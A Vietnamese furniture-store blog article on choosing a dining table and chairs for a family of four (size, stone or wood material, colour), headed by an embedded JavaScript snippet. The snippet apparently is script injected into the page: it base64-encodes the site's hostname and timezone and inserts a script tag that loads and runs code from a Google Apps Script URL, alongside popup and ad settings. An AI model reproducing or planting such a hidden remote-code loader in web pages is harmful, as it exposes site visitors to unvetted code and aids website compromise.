var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Tư vấn chọn bàn ghế ăn cho gia đình 4 người phù hợp nhất

Chọn bàn ghế ăn cho gia đình 4 người như thế nào là phù hợp? Hiện nay bàn ghế ăn rất đa dạng mẫu mã nên việc chọn lựa cũng sẽ dễ dàng hơn rất nhiều.

Bàn ghế ăn là món đồ không thể nào thiếu trong nhà bếp. Với những gia đình có 4 người chọn như thế nào không phải ai cũng biết. Tham khảo ngay bài viết sau đây để có câu trả lời.

Tư vấn chọn bàn ghế ăn cho gia đình 4 người

Chọn kích thước

Với gia đình 4 người bạn có thể chọn loại bàn ghế ăn có kích thước vừa phải. Bạn có thể chọn bàn ăn 6 ghế hay 4 ghế là hợp nhất. Với loại 4 ghế sẽ vừa vặn cho các thành viên gia đình, loại 6 ghế sẽ giúp sự tiện lợi khi nhà có khách. Mua bàn ăn mặt đá nhập khẩu hay hàng trong nước là tùy thuộc gia đình bạn. Không nên chọn loại bàn ăn quá to 8 – 10 ghế sẽ khó bố trí và không cần thiết.

bàn ghế ăn cho gia đình 4 người
Gia đình 4 người nên chọn bàn ăn 4 – 6 ghế


Chọn chất liệu

Bạn có thể chọn bộ bàn ăn mặt đá hay bàn ăn bằng gỗ, kính tùy theo ý thích. Trong đó hiện nay bàn ăn mặt đá đang rất được ưa chuộng và nhiều gia đình chọn lựa. Chất liệu đá vừa sang trọng lại vừa rất dễ vệ sinh lau chùi.

bàn ghế ăn cho gia đình 4 người
Bàn ăn mặt đá đang rất được yêu thích, bạn có thể chọn cho gia đình 4 người nhé


Chọn màu sắc

Màu sắc bàn ghế ăn hiện nay vô cùng đa dạng cho bạn chọn lựa. Gia đình 4 người có thể chọn bàn ghế ăn màu trầm hay sáng, nhẹ nhàng… tùy thuộc gia chủ. Với những gam màu nào thì bạn có thể xem xét kết hợp cùng thảm sofa để tạo nên vẻ đẹp hài hòa nhất. Những tấm thảm sofa hình chữ nhật bạn hoàn toàn có thể kết hợp cùng với bàn ghế ăn trong nhà bếp đấy nhé.

bàn ghế ăn cho gia đình 4 người
Chọn màu sắc bàn ghế ăn tùy theo sở thích gia chủ

Chọn bàn ghế ăn cho gia đình 4 người thật dễ dàng phải không nào. Đến ngay Nội Thất Xinh để chọn cho gia đình những mẫu bàn ghế ăn đẹp và bền nhất.

=> Tham khảo:  3 bộ bàn ghế ăn bằng đá kết hợp kim loại cao cấp